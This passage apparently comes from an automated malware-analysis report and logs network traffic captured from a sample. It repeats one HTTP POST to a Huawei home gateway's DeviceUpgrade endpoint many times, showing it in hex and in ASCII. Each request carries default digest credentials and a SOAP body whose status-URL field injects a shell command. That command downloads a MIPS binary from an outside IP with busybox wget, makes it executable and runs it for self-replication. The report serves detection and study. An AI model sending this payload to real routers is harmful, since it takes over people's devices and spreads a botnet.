/yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
